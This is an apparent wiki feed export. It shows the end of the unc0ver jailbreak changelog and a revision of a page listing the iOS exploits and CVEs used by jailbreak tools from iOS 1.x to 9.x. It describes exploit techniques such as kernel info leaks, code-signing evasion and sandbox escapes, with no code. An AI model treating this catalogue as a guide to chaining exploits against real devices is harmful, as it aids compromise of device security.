* Update system-memory-reset fix to fix random reboots&lt;br /&gt;
* Add Apple to the credits section for development&lt;br /&gt;
* Fix error at stage 2 when jailbreaking after updating from a lower firmware while preserving the app data&lt;br /&gt;
* Fix the app crashing up on stared up on iOS 11&lt;br /&gt;
|-&lt;br /&gt;
| v3.5.2&lt;br /&gt;
|&lt;br /&gt;
* Fix the SockPuppet 3.0 exploit on iPad Mini 4 and iPad Air 2&lt;br /&gt;
|-&lt;br /&gt;
| v3.5.3&lt;br /&gt;
|&lt;br /&gt;
* Add WIP partial support for A12-A12X devices on iOS 12.1.3, 12.1.4, 12.2 and 12.4 with support for setting HSP#4 as TFP0, setting kernel_task info, exporting kernel_task port, dumping APTicket, logging KASLR shift and ECID and disabling auto updates&lt;br /&gt;
|-&lt;br /&gt;
| v3.5.4&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | {{date|2019|08|22}}&lt;br /&gt;
|&lt;br /&gt;
* Add full-fledged SSH support with root-shell for A12-A12X devices on iOS 12.1.3-12.4&lt;br /&gt;
* Add support for arbitrary unsigned code execution on A12-A12 devices on iOS 12.1.3-12.4&lt;br /&gt;
(Note: Object files will have to be signed with a CMS blob using the codesign utility)&lt;br /&gt;
* Add support for running expired or revoked apps on A12-A12X devices on iOS 12.1.3-12.4&lt;br /&gt;
* Fix instant or random reboots after jailbreaking with the SockPuppet3.0 exploit on A7-A12X devices on iOS 11.0-12.4&lt;br /&gt;
Note: Code injection is not supported on A12-A12X devices as of yet&lt;br /&gt;
|-&lt;br /&gt;
| v3.5.5&lt;br /&gt;
|&lt;br /&gt;
* Fixes issues with the jailbreak introduced with the last update&lt;br /&gt;
* Fixes iOS 11 support&lt;br /&gt;
|-&lt;br /&gt;
| v3.5.6&lt;br /&gt;
| {{date|2019|08|24}}&lt;br /&gt;
|&lt;br /&gt;
* Add support for remounting the RootFS as read-write on A12-A12X devices running iOS 12.1.3-12.4&lt;br /&gt;
* Adds support for restoring the RootFS on A12-A12X devices running iOS 12.1.3-12.4&lt;br /&gt;
|-&lt;br /&gt;
| v3.6.0&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | {{date|2019|09|08}}&lt;br /&gt;
|&lt;br /&gt;
* Completely redesign and rewrite all jailbreak patches from scratch.&lt;br /&gt;
* Make the jailbreak patches static and not dynamic, Meaning that the system stability will be completely stock after the jailbreak.&lt;br /&gt;
* Fix the app crashing on launch when signed with provisioning profiles with non-ASCII characters.&lt;br /&gt;
* Internally prepare jailbreak patches for full-fledged A12-A12X support.&lt;br /&gt;
* Make the jailbreak significantly and noticeably more reliable and faster to run.&lt;br /&gt;
* Add the SockPort 3.0 exploit for improved reliability on iOS 12.4 and devices with low RAM.&lt;br /&gt;
* Fix SSH support for arm64e devices running iOS 12.0-12.1.2.&lt;br /&gt;
* Make it possible to jailbreak with corrupted SystemVersion.plist on iOS 12.4.&lt;br /&gt;
* Make the jailbreak perform proper clean up to preserve system stability in case of a failure.&lt;br /&gt;
* Fix the jbctl command-line utility.&lt;br /&gt;
* Switch to a new technique for setting the system boot nonce generator that works on all arm64e devices running iOS12.0-12.4, (Thanks to [https://github.com/0x7ff @0x7ff] for the idea).&lt;br /&gt;
* Fix a bug with the initial Cydia installation getting stuck sometimes.&lt;br /&gt;
* Significantly speed up the initial Cydia installation process.&lt;br /&gt;
* Internally prepare upcoming stable substitute support.&lt;br /&gt;
* Internally prepare Cydia and its resources for full-fledged arm64e support.&lt;br /&gt;
|-&lt;br /&gt;
| v3.6.1&lt;br /&gt;
|&lt;br /&gt;
* Improves auto-exploit selection.&lt;br /&gt;
|-&lt;br /&gt;
| v3.6.2&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | {{date|2019|09|09}}&lt;br /&gt;
|&lt;br /&gt;
* Fix an issue with the kernel virtual memory access APIs on A7-A8 devices that rendered the jailbreak useless by causing it to fail to copy big kernel data (Error known as: &amp;quot;Unable to copy container profile in kernel memory.&amp;quot;)&lt;br /&gt;
|-&lt;br /&gt;
| v3.6.3&lt;br /&gt;
|&lt;br /&gt;
* Fix an issue with finding kernel offsets on A8&lt;br /&gt;
|-&lt;br /&gt;
| v3.7.0~b2&lt;br /&gt;
| rowspan=&amp;quot;2&amp;quot; | {{date|2019|10|14}}&lt;br /&gt;
|&lt;br /&gt;
* Full-fledged A12-A12X support with Cydia and system-wide tweak injection&lt;br /&gt;
* Fix Camera on A12-A12X devices&lt;br /&gt;
* Fix GPS on A12-A12X devices&lt;br /&gt;
* Fix App Store purchases on A12-A12X devices&lt;br /&gt;
* Fix Face ID on A12-A12X devices&lt;br /&gt;
* Fix performance issues on A12-A12X devices&lt;br /&gt;
* Fix stability issues on A12-A12X devices&lt;br /&gt;
* Fix reload system daemons issues on A12-A12X devices&lt;br /&gt;
* Fix general stability issues with system services on A12-A12X devices&lt;br /&gt;
* Fix system shutdown on A12-A12X devices&lt;br /&gt;
* Fix system restart on A12-A12X devices&lt;br /&gt;
* Fix USB on A12-A12X devices&lt;br /&gt;
* Fix Xcode debugging on A12-A12X devices&lt;br /&gt;
* Fix a bug in libsubstitute that broke the TetherMe tweak A12-A12X devices&lt;br /&gt;
* Enable full-fledged AMFI/CoreTrust bypass on A12-A12X devices&lt;br /&gt;
* Fix memory management issues on A12-A12X devices&lt;br /&gt;
* Fix tweak injection to MobileSafari on A12-A12X devices&lt;br /&gt;
* Make reload system daemons reload services with launchctl instead of ldrestart&lt;br /&gt;
* Reload system daemons before restarting SpringBoard&lt;br /&gt;
|-&lt;br /&gt;
| v3.7.0~b3&lt;br /&gt;
|&lt;br /&gt;
* Correct a problem with reload system daemons when using Substrate (non-A12 devices)&lt;br /&gt;
|-&lt;br /&gt;
| v3.7.0~b4&lt;br /&gt;
| {{date|2019|12|02}}&lt;br /&gt;
|&lt;br /&gt;
* Update bundled Cydia to prompt for network access on China devices&lt;br /&gt;
* Rename the bundled mobilesubstrate to match other jailbreaks&lt;br /&gt;
* Update the bundled substitute to 0.1.0&lt;br /&gt;
|-&lt;br /&gt;
| v3.8.0~b1&lt;br /&gt;
| {{date|2019|12|09}}&lt;br /&gt;
|&lt;br /&gt;
* Add iOS 12.4.1 support for A12 iPhones (iPads not supported at this time)&lt;br /&gt;
|-&lt;br /&gt;
| v4.0.0&lt;br /&gt;
| {{date|2020|02|15}}&lt;br /&gt;
|&lt;br /&gt;
* Full-fledged support for A12-A13 devices on iOS 13.0-13.3 with Cydia and system-wide tweak injection&lt;br /&gt;
|-&lt;br /&gt;
| v4.0.1&lt;br /&gt;
| {{date|2020|02|16}}&lt;br /&gt;
|&lt;br /&gt;
* Fix App Store for A12-A13&lt;br /&gt;
* Fix push notifications for A12-A13&lt;br /&gt;
* Improve reliability for A12-A13 devices on iOS 13.0-13.3&lt;br /&gt;
|-&lt;br /&gt;
| v4.0.2&lt;br /&gt;
| {{date|2020|02|17}}&lt;br /&gt;
|&lt;br /&gt;
* Fix iOS 13.0-13.2.3 support&lt;br /&gt;
* Fix injection into WebContent&lt;br /&gt;
|-&lt;br /&gt;
| v4.0.3&lt;br /&gt;
| {{date|2020|02|19}}&lt;br /&gt;
|&lt;br /&gt;
* Fully fix App Store on A12-A13&lt;br /&gt;
* Fix a newly introduced bug that affected system services on A12-A13&lt;br /&gt;
* Improve the exploit reliability by guiding the user on proper use on A12-A13&lt;br /&gt;
|-&lt;br /&gt;
| v4.1.0&lt;br /&gt;
| {{date|2020|02|23}}&lt;br /&gt;
|&lt;br /&gt;
* Replace the oob_timestamp exploit by [https://twitter.com/bazad @bazad] with the time_waste exploit by [https://twitter.com/jakeashacks @jakeashacks] for 99% stage 1 (exploit) reliability on iOS 13.0-13.3&lt;br /&gt;
* Fix compatibility issues with iOS 11.0-12.4 and 13.0-13.2.3&lt;br /&gt;
|-&lt;br /&gt;
| v4.2.0&lt;br /&gt;
| {{date|2020|02|25}}&lt;br /&gt;
|&lt;br /&gt;
* Fix issues with system services on A12-A13 (i.e. iMessage notifications)&lt;br /&gt;
* Add iOS 13.0-13.3 support for A8-A11 devices&lt;br /&gt;
* Fix temporary freeze after the jailbreak completed alert&lt;br /&gt;
|-&lt;br /&gt;
| v4.2.1&lt;br /&gt;
| {{date|2020|02|26}}&lt;br /&gt;
|&lt;br /&gt;
* Fix a bug that caused unreliability in starting up substitute&lt;br /&gt;
* Fix an issue that broke battery settings and caused extra battery drain&lt;br /&gt;
|-&lt;br /&gt;
| v4.3.1&lt;br /&gt;
| {{date|2020|03|08}}&lt;br /&gt;
|&lt;br /&gt;
* Bumped version to 4.3.1 due to a github bug causing an older file to be temporarily available&lt;br /&gt;
* Add support for rebooting the userspace for the first time in a jailbreak&lt;br /&gt;
* Add support for injecting to the entire userspace&lt;br /&gt;
* Add support for looking up or registering services from the sandbox with the cy: prefix for developers&lt;br /&gt;
* Reboot the userspace after jailbreaking&lt;br /&gt;
* Make major design changes to preserve stock system performance&lt;br /&gt;
* Fix random reboots, freezes, memory issues and any known problem that affected system services or apps&lt;br /&gt;
* Fix persistent software update blocker on iOS 13 (Works in the jailed state too)&lt;br /&gt;
* Fix a design problem that affected the Succession restore tool&lt;br /&gt;
* Automatically re-enable software updates when restoring RootFS&lt;br /&gt;
|-&lt;br /&gt;
| v5.0.0&lt;br /&gt;
| {{date|2020|05|23}}&lt;br /&gt;
|&lt;br /&gt;
* Full-fledged support for all devices on iOS 11.0-13.5 with Cydia and tweak injection&lt;br /&gt;
|-&lt;br /&gt;
| v5.0.1&lt;br /&gt;
| {{date|2020|05|24}}&lt;br /&gt;
|&lt;br /&gt;
* Full-fledged support for all devices on iOS 11.0-13.5 with Cydia and tweak injection&lt;br /&gt;
* Enable unrestricted storage access to jailbreak applications for sandbox backwards compatibility&amp;lt;br&amp;gt;while keeping security intact by leaving the security restrictions enabled for system and user applications&lt;br /&gt;
* Update Phone Rebel case models and bundled packages&lt;br /&gt;
|-&lt;br /&gt;
| v5.2.0&lt;br /&gt;
| {{date|2020|06|09}}&lt;br /&gt;
|&lt;br /&gt;
* Enable iOS 13.5.5~b1 support&lt;br /&gt;
* Fix a logic bug in disabling auto updates&lt;br /&gt;
* Update bundled Cydia to fix crashes on iOS 13.5 with Hardware Keyboard enabled&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
[[Category:Jailbreaks]]&lt;br /&gt;
[[Category:Jailbreaking]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=103086</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=103086"/>
		<updated>2020-06-01T23:51:24Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Unc0ver (13.0 - 13.5) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
